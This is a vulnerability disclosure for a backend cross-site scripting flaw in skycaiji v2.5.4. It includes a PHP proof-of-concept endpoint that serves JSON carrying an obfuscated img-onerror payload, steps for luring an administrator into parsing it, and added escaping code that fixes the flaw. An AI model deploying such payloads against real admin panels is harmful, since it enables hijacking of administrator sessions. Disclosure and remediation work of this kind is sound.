CVE-2023-33394: skycaiji-v2.5.4 has a backend xss vulnerability
skycaiji v2.5.4 is vulnerable to Cross Site Scripting (XSS). Attackers can achieve backend XSS by deploying malicious JSON data.
First, download the source code from the following site:
https://down.chinaz.com/api/index/download?id=38972&type=code
Place it directly in the root directory of the website, access the server IP, and follow the prompts to install.
After installation, log in to the backend.
Click through to the function point shown above.
This is a JSON parsing function, but it has no complete XSS protection in place.
We can build a file that returns JSON ourselves and have the backend access it; the JSON it returns carries an XSS payload, which triggers the XSS code in the backend.
<?php
// PoC endpoint: returns JSON whose "name" field carries an HTML/JS payload.
$data = array(
    'name' => 'John <img src=\'x\' onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))">',
    'age' => 30,
    'email' => '[email protected]',
);
$json = json_encode($data);
header('Content-type: application/json');
echo $json;
This code returns JSON data carrying a malicious payload.
We deploy it on our own VPS and induce the backend administrator to parse its data; the XSS code is then triggered successfully.
Attackers can use this vulnerability to do anything that JavaScript code can do.
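The missing protection described above is output encoding of the remote JSON before it reaches the administrator's page. The following is an added example, not skycaiji's own code: the helper names `esc_html_value` and `render_json_preview` are hypothetical, and it assumes the backend renders the decoded JSON into HTML server-side.

```php
<?php
// Added example: hypothetical helper names, not skycaiji's own code.

// Escape one scalar taken from untrusted JSON for HTML text/attribute context.
function esc_html_value($value): string
{
    if (is_bool($value)) {
        return $value ? 'true' : 'false';
    }
    if ($value === null) {
        return 'null';
    }
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render decoded JSON as a nested list. Keys are escaped as well as values,
// because the remote server controls both.
function render_json_preview($node, int $depth = 0): string
{
    if ($depth > 16) {                 // bound recursion on hostile nesting
        return '<em>[too deep]</em>';
    }
    if (!is_array($node)) {
        return esc_html_value($node);
    }
    $html = '<ul>';
    foreach ($node as $key => $child) {
        $html .= '<li><b>' . esc_html_value($key) . '</b>: '
               . render_json_preview($child, $depth + 1) . '</li>';
    }
    return $html . '</ul>';
}

// Constructed sample: the kind of response body the PoC endpoint returns.
$remoteBody = json_encode([
    'name' => 'John <img src=\'x\' onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))">',
    'age'  => 30,
]);

$decoded = json_decode($remoteBody, true, 32);
if (json_last_error() !== JSON_ERROR_NONE) {
    exit('invalid JSON');
}
echo render_json_preview($decoded), "\n";
```

With this encoding the `<img>` markup reaches the browser as literal text, so no element and no `onerror` handler is created. If the preview is built client-side instead, the equivalent is assigning values through `textContent` rather than `innerHTML`.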